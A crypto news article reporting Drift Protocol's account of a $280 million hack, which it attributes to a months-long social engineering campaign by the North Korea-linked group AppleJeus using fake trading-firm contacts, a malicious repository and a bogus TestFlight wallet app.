Drift Protocol Exposes North Korea’s Social Engineering Attack Scheme

Key Insights

• Solana-based Drift Protocol has attributed the $280 million exploit to attackers infiltrating its team.
• The infiltration happened through a social engineering operation that spanned more than six months and several face-to-face interactions.
• North Korea hacker group AppleJeus has been identified as being behind the incident.

Solana-based decentralized exchange Drift Protocol has disclosed the possible attack vectors behind its April 1 hack. In a post on X, the protocol said preliminary investigations showed bad actors infiltrated its system.

The protocol lost over $280 million in the exploit. Bad actors used complex social engineering for months before the attack.

Investigations Reveals Attackers Expansive Months-long Strategy

According to the report, the attack involved considerable resources, months of deliberate planning and organizational backing. Security researchers involved in the investigation traced the compromise to the Drift protocol team’s interaction with a trading group.

Members of the group claimed to be a quantitative trading firm. They reportedly approached the Drift team at a major crypto conference in the fall of 2025. They proposed integrating on the protocol, leading to the creation of a Telegram group and further interactions.

The group committed resources to the integration. They onboarded an Ecosystem Vault on Drift Protocol between December 2025 and January 2026. They also deposited over $1 million during this period.

It noted:

The preliminary investigation found that the group shared several links during integration talks. They claimed these links were connected to tools, projects, and apps under development. Some of these links included the malicious software that enabled the attack.

As an earlier report from Drift Protocol noted, the attacker used Double Nonce to execute the exploit after gaining control of 2/5 of its multisig. A new investigation now shows how the hacker gained control of these multisigs, which the platform said are all cold wallets.

One of Drift Protocol’s contributors was likely compromised. They cloned a code repository from the group, thinking they were deploying a front end for the vault.

The second contributor was also compromised after downloading a TestFlight application that the group claimed to be its wallet.

Attributions Tie Incident North Korea group AppleJeus

Meanwhile, investigations by SEALS 911 have attributed the incident to UNC4736, a North Korean state-affiliated group. The group, also known as AppleJeus or Citrine Sleet, carried out the 2024 hack of Radiant Capital. That attack resulted in a $53 million loss.

Mandiant is still investigating the incident and has not made an official attribution. However, many observers believe the attack patterns strongly support the claim that the group was involved.

Drift Protocol wrote:

This further confirms an earlier Elliptic report linking the hack to North Korea-backed actors. According to ZachXBT, AppleJeus is one of two major North Korean groups behind sophisticated crypto attacks.

The other group, TraderTraitor, has also carried out large-scale operations targeting the digital asset industry.

Interestingly, the DeFi protocol noted that the individuals they met in person were not North Korean nationals. North Korean hacking groups are shifting tactics.

They increasingly use intermediaries to build face-to-face relationships. They even attend crypto events to strengthen trust before launching attacks.

The post Drift Protocol Exposes North Korea’s Social Engineering Attack Scheme appeared first on The Market Periodical.